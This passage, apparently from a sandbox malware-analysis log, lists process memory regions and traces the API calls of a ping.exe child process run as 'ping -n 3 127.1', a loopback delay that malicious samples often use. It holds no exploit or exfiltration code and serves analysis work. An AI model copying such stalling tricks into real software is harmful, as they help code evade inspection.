start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7983 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7984 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7985 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7986 start_va = 0xc90000 end_va = 0xc91fff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 8007 start_va = 0xda0000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 8008 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8009 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8010 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8043 start_va = 0xbb0000 end_va = 0xbbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bb0000" filename = "" Region: id = 8044 start_va = 0xbd0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 8045 start_va = 0xca0000 end_va = 0xd1dfff entry_point = 0xca0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8046 start_va = 0xe20000 end_va = 0xf1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 8047 start_va = 0x73430000 end_va = 0x73450fff entry_point = 0x73430000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 8048 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8049 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8050 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8051 start_va = 0x7e950000 end_va = 0x7ea4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e950000" filename = "" Region: id = 8052 start_va = 0xbc0000 end_va = 0xbc3fff entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 8053 start_va = 0xd20000 end_va = 0xd23fff entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 8054 start_va = 0x73420000 end_va = 0x7342efff entry_point = 0x73420000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Thread: id = 432 os_tid = 0x2b8 Process: id = "158" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x39d0000" os_pid = "0x844" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8069 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 8070 start_va = 0xda0000 end_va = 0xdbffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 8071 start_va = 0xdc0000 end_va = 0xdc1fff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 8072 start_va = 0xdd0000 end_va = 0xddefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 8073 start_va = 0xde0000 end_va = 0xe1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 8074 start_va = 0xe20000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 8075 start_va = 0xe60000 end_va = 0xe63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 8076 start_va = 0xe70000 end_va = 0xe70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e70000" filename = "" Region: id = 8077 start_va = 0xe80000 end_va = 0xe81fff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 8078 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8079 start_va = 0x7f6b0000 end_va = 0x7f6d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6b0000" filename = "" Region: id = 8080 start_va = 0x7f6d9000 end_va = 0x7f6d9fff entry_point = 0x0 region_type = private name = "private_0x000000007f6d9000" filename = "" Region: id = 8081 start_va = 0x7f6da000 end_va = 0x7f6dcfff entry_point = 0x0 region_type = private name = "private_0x000000007f6da000" filename = "" Region: id = 8082 start_va = 0x7f6dd000 end_va = 0x7f6ddfff entry_point = 0x0 region_type = private name = "private_0x000000007f6dd000" filename = "" Region: id = 8083 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8084 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8085 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8086 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 8087 start_va = 0xfc0000 end_va = 0xfcffff entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 8088 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8089 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8090 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8091 start_va = 0xda0000 end_va = 0xdaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000da0000" filename = "" Region: id = 8092 start_va = 0xdb0000 end_va = 0xdb3fff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 8093 start_va = 0xe90000 end_va = 0xf8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 8094 start_va = 0xfd0000 end_va = 0x104dfff entry_point = 0xfd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8095 start_va = 0x1120000 end_va = 0x112ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 8096 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 8097 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 8098 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8099 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8100 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8101 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8102 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 8103 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8104 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8105 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8106 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 8107 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8108 start_va = 0x7f5b0000 end_va = 0x7f6affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f5b0000" filename = "" Region: id = 8109 start_va = 0x1050000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 8110 start_va = 0x1090000 end_va = 0x10cffff entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 8111 start_va = 0x7f6d6000 end_va = 0x7f6d8fff entry_point = 0x0 region_type = private name = "private_0x000000007f6d6000" filename = "" Region: id = 8112 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 8113 start_va = 0xdc0000 end_va = 0xdc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dc0000" filename = "" Region: id = 8114 start_va = 0xf90000 end_va = 0xf90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f90000" filename = "" Region: id = 8115 start_va = 0xfa0000 end_va = 0xfa2fff entry_point = 0xfa0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Thread: id = 437 os_tid = 0x848 [0141.158] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0141.158] __set_app_type (_Type=0x1) [0141.158] __p__fmode () returned 0x76ea1768 [0141.158] __p__commode () returned 0x76ea176c [0141.158] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0141.158] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0141.158] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.160] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.160] _fileno (_File=0x76ea4c28) returned 1 [0141.160] _get_osfhandle (_FileHandle=1) returned 0x28 [0141.160] GetFileType (hFile=0x28) returned 0x2 [0141.160] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe5f108 | out: lpMode=0xe5f108) returned 0 [0141.160] GetLastError () returned 0x6 [0141.160] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe5f06c, nSize=0x50 | out: lpBuffer="䤐é") returned 0x0 [0141.160] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0141.162] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xe5f124 | out: phkResult=0xe5f124*=0x88) returned 0x0 [0141.162] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xe5f118, lpData=0xe5f120, lpcbData=0xe5f11c*=0x4 | out: lpType=0xe5f118*=0x0, lpData=0xe5f120*=0x0, lpcbData=0xe5f11c*=0x4) returned 0x2 [0141.162] RegCloseKey (hKey=0x88) returned 0x0 [0141.162] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0xe5f0e8*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xe5f124 | out: ppResult=0xe5f124*=0xe9c340*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xe98a00*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0141.162] FreeAddrInfoW (pAddrInfo=0xe9c340*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xe98a00*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0141.162] IcmpCreateFile () returned 0xe96bf0 [0141.165] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xe9c278 [0141.165] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xea5270 [0141.165] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xe5f220, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0141.166] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0xe5f118, nSize=0x0, Arguments=0xe5f114 | out: lpBuffer="竈ê﫨å┗\x94䰨盪❋") returned 0x14 [0141.167] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0141.167] _fileno (_File=0x76ea4c28) returned 1 [0141.167] _get_osfhandle (_FileHandle=1) returned 0x28 [0141.167] GetFileType (hFile=0x28) returned 0x2 [0141.167] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe5f0dc | out: lpMode=0xe5f0dc) returned 0 [0141.167] GetLastError () returned 0x6 [0141.167] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe5f040, nSize=0x50 | out: lpBuffer="å❋") returned 0x0 [0141.167] _fileno (_File=0x76ea4c28) returned 1 [0141.167] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0141.167] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0141.167] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xea7b00 [0141.167] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0xea7b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0141.168] _fileno (_File=0x76ea4c28) returned 1 [0141.168] _write (in: _FileHandle=1, _Buf=0xea7b00*, _MaxCharCount=0x14 | out: _Buf=0xea7b00*) returned 20 [0141.168] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0141.168] _fileno (_File=0x76ea4c28) returned 1 [0141.168] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0141.168] LocalFree (hMem=0xea7b00) returned 0x0 [0141.168] LocalFree (hMem=0xea7ac8) returned 0x0 [0141.168] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xe5f118, nSize=0x0, Arguments=0xe5f114 | out: lpBuffer="竈ê﫨å▪\x94䰨盪❚") returned 0x18 [0141.168] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0141.168] _fileno (_File=0x76ea4c28) returned 1 [0141.168] _get_osfhandle (_FileHandle=1) returned 0x28 [0141.168] GetFileType (hFile=0x28) returned 0x2 [0141.168] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe5f0dc | out: lpMode=0xe5f0dc) returned 0 [0141.168] GetLastError () returned 0x6 [0141.168] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe5f040, nSize=0x50 | out: lpBuffer="å❚") returned 0x0 [0141.168] _fileno (_File=0x76ea4c28) returned 1 [0141.168] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0141.168] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0141.168] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0xe9c138 [0141.168] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0xe9c138, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0141.168] _fileno (_File=0x76ea4c28) returned 1 [0141.168] _write (in: _FileHandle=1, _Buf=0xe9c138*, _MaxCharCount=0x18 | out: _Buf=0xe9c138*) returned 24 [0141.168] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0141.168] _fileno (_File=0x76ea4c28) returned 1 [0141.168] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0141.168] LocalFree (hMem=0xe9c138) returned 0x0 [0141.168] LocalFree (hMem=0xea7ac8) returned 0x0 [0141.168] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0141.168] IcmpSendEcho2Ex (in: IcmpHandle=0xe96bf0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xe9c278, RequestSize=0x20, RequestOptions=0xe5f194, ReplyBuffer=0xea5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xea5270) returned 0x1 [0141.169] InetNtopW (in: Family=2, pAddr=0xe5f184, pStringBuf=0xe5f2ac, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0141.169] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xe5f118, nSize=0x0, Arguments=0xe5f114 | out: lpBuffer="笈ê﫨å⛔\x94䰨盪✣") returned 0x16 [0141.169] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0141.169] _fileno (_File=0x76ea4c28) returned 1 [0141.169] _get_osfhandle (_FileHandle=1) returned 0x28 [0141.169] GetFileType (hFile=0x28) returned 0x2 [0141.169] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe5f0dc | out: lpMode=0xe5f0dc) returned 0 [0141.169] GetLastError () returned 0x6 [0141.170] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe5f040, nSize=0x50 | out: lpBuffer="å✣") returned 0x0 [0141.170] _fileno (_File=0x76ea4c28) returned 1 [0141.170] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0141.170] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0141.170] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xea7ae8 [0141.170] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xea7ae8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0141.170] _fileno (_File=0x76ea4c28) returned 1 [0141.170] _write (in: _FileHandle=1, _Buf=0xea7ae8*, _MaxCharCount=0x16 | out: _Buf=0xea7ae8*) returned 22 [0141.170] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0141.170] _fileno (_File=0x76ea4c28) returned 1 [0141.170] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0141.170] LocalFree (hMem=0xea7ae8) returned 0x0 [0141.170] LocalFree (hMem=0xea7b08) returned 0x0 [0141.170] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xe5f118, nSize=0x0, Arguments=0xe5f114 | out: lpBuffer="翸ê﫨å⛿\x94䰨盪✼") returned 0x9 [0141.170] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0141.170] _fileno (_File=0x76ea4c28) returned 1 [0141.170] _get_osfhandle (_FileHandle=1) returned 0x28 [0141.170] GetFileType (hFile=0x28) returned 0x2 [0141.170] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe5f0dc | out: lpMode=0xe5f0dc) returned 0 [0141.170] GetLastError () returned 0x6 [0141.170] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe5f040, nSize=0x50 | out: lpBuffer="å✼") returned 0x0 [0141.170] _fileno (_File=0x76ea4c28) returned 1 [0141.170] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0141.170] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.170] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe98a48 [0141.170] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xe98a48, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0141.170] _fileno (_File=0x76ea4c28) returned 1 [0141.170] _write (in: _FileHandle=1, _Buf=0xe98a48*, _MaxCharCount=0x9 | out: _Buf=0xe98a48*) returned 9 [0141.170] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0141.170] _fileno (_File=0x76ea4c28) returned 1 [0141.170] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0141.170] LocalFree (hMem=0xe98a48) returned 0x0 [0141.170] LocalFree (hMem=0xea7ff8) returned 0x0 [0141.171] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xe5f11c, nSize=0x0, Arguments=0xe5f118 | out: lpBuffer="翸ê﫨å➷\x94䰨盪✧") returned 0x9 [0141.171] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0141.171] _fileno (_File=0x76ea4c28) returned 1 [0141.171] _get_osfhandle (_FileHandle=1) returned 0x28 [0141.171] GetFileType (hFile=0x28) returned 0x2 [0141.171] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe5f0e0 | out: lpMode=0xe5f0e0) returned 0 [0141.171] GetLastError () returned 0x6 [0141.171] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe5f044, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0141.171] _fileno (_File=0x76ea4c28) returned 1 [0141.171] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0141.171] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.171] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe989a0 [0141.171] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xe989a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0141.171] _fileno (_File=0x76ea4c28) returned 1 [0141.171] _write (in: _FileHandle=1, _Buf=0xe989a0*, _MaxCharCount=0x9 | out: _Buf=0xe989a0*) returned 9 [0141.171] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0141.171] _fileno (_File=0x76ea4c28) returned 1 [0141.171] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0141.171] LocalFree (hMem=0xe989a0) returned 0x0 [0141.171] LocalFree (hMem=0xea7ff8) returned 0x0 [0141.171] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xe5f118, nSize=0x0, Arguments=0xe5f114 | out: lpBuffer="翸ê﫨å⟘\x94䰨盪✨") returned 0x9 [0141.171] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0141.171] _fileno (_File=0x76ea4c28) returned 1 [0141.171] _get_osfhandle (_FileHandle=1) returned 0x28 [0141.171] GetFileType (hFile=0x28) returned 0x2 [0141.171] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe5f0dc | out: lpMode=0xe5f0dc) returned 0 [0141.171] GetLastError () returned 0x6 [0141.171] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe5f040, nSize=0x50 | out: lpBuffer="å✨") returned 0x0 [0141.171] _fileno (_File=0x76ea4c28) returned 1 [0141.171] 